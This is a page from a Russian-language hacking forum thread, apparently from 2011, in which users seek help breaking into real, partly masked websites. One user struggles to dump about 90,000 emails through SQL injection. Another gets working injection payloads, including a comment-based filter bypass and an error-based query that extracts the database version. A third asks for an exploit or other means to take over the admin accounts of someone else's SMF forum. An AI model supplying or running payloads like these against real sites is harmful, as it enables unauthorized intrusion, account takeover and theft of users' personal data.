Старый 28.09.2011, 11:26   #1351
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

вот столкнулся с такой траблой

вроде бы обычная скуль, есть вывод, но:

при попытке вывести к примеру поле email по limit выводиться всего 2 мыла
хотя count(*) показывает что там 90К мыл
GROUP_CONCAT(email) тоже выводит несколько десятков мыл

с чем это может быть связано. пытался объединить поля вместе с userID тот же эффект.

вариант забирать через where+userID= не совсем прокатывает, так как userID имеет не числовой параметр.
durito вне форума   Ответить с цитированием
Старый 28.09.2011, 11:39   #1352
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от durito Посмотреть сообщение
вот столкнулся с такой траблой

вроде бы обычная скуль, есть вывод, но:

при попытке вывести к примеру поле email по limit выводиться всего 2 мыла
хотя count(*) показывает что там 90К мыл
GROUP_CONCAT(email) тоже выводит несколько десятков мыл

с чем это может быть связано. пытался объединить поля вместе с userID тот же эффект.

вариант забирать через where+userID= не совсем прокатывает, так как userID имеет не числовой параметр.

Скинь линк в ПМ, посмотрю.
Flakt вне форума   Ответить с цитированием
Старый 28.09.2011, 18:09   #1353
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

http://www.***.com/profiles/members-profile.php?member=15743+UNION+SELECT+1,2--+
Подскажите, почему вываливаетсся все время 404 при правильном запросе? Как в таком случае её докрутить?

Последний раз редактировалось Twost; 17.05.2013 в 12:34..
Consistent вне форума   Ответить с цитированием
Старый 28.09.2011, 21:56   #1354
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

Цитата:
Сообщение от Consistent Посмотреть сообщение
http://www.***.com/profiles/members-profile.php?member=15743+UNION+SELECT+1,2--+
Подскажите, почему вываливаетсся все время 404 при правильном запросе? Как в таком случае её докрутить?
http://www.***.com/profiles/members-profile.php?member=15743-- union select >> false
http://www.***.com/profiles/members-profile.php?member=15743-- /*!union*/ select >> true

Там несколько запросов, выводи в ошибке:

http://www.***.com/profiles/members-profile.php?member=15743 and(select min(@:=1)from(select 1 /*!union*/ select 2)x group by concat(version(),@:=@-1))-- s

Последний раз редактировалось Twost; 17.05.2013 в 12:34..
~d0s~ вне форума   Ответить с цитированием
Старый 29.09.2011, 20:52   #1355
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

~d0s~
Большое спасибо. Правда я не понял, как ты пришел к такому запросу... Если будет желание ткнуть носом, прошу в пм. Буду крайне признателен =)
Consistent вне форума   Ответить с цитированием
Старый 30.09.2011, 13:10   #1356
Кирдык-батыр
 
Регистрация: 30.09.2011
Сообщений: 5
Репутация: 0
По умолчанию

Есть ли эксплоит под smf 2.0.1 или еще нет? Или какие возможности есть для взлома такого форума? Есть ftp доступ на сервер, но в субдомен (параллельный), в папку форума доступа нет. В админку хоста, есс-но, тоже нет. Есть зарегиный аккаунт простого юзера. Нужен доступ к учетке админа (их трое), u=1,2 и 13. Капчи нет, регистрация через одобрение админом.
Кирдык-батыр вне форума   Ответить с цитированием
Старый 30.09.2011, 13:49   #1357
Кирдык-батыр
 
Регистрация: 30.09.2011
Сообщений: 5
Репутация: 0
По умолчанию

Еще вопрос: если у меня есть доступ по ftp к одному из разделов хоста, в пределах нужного аккаунта, естесственно, могу ли я прочесть файл из соседней директории, к которой отдельный запароленый ftp-доступ, от имени apacha? То есть, если написать ему программу на php, то у него ведь, по идее, доступ root. По крайней мере, из панели управления я мог ходить по всем разделам, хоть у них разный ftp-доступ.
Кирдык-батыр вне форума   Ответить с цитированием
Старый 30.09.2011, 14:27   #1358
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

Кирдык-батыр с каких пор php скрипты работают под рутом? они работают под правами веб-сервера, а какие-там выставлены права надо смотреть.
durito вне форума   Ответить с цитированием
Старый 30.09.2011, 14:41   #1359
tipsy
 
Аватар для tipsy
 
Регистрация: 10.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Кирдык-батыр, если вы всерьёз заинтересовались темой веб-безопасности, то для начала было бы полезно раскурить пару книг по php и linux, просто для создания необходимой базы знаний.

Если вы просто хотите решить разовую задачу, вам охотно помогут за достойное вознаграждение.

В обоих случаях, не стоит выносить людям мозг такими вопросами.
tipsy вне форума   Ответить с цитированием
Старый 30.09.2011, 18:21   #1360
avenu
 
Аватар для avenu
 
Регистрация: 10.07.2010
Сообщений: 36
Репутация: 13
По умолчанию

13й еррор означает, что прав на запись в папку нету, поищи папки на серве, на которых 777 чмод и будет тебе счастье
__________________
С утра и навсегда
avenu вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot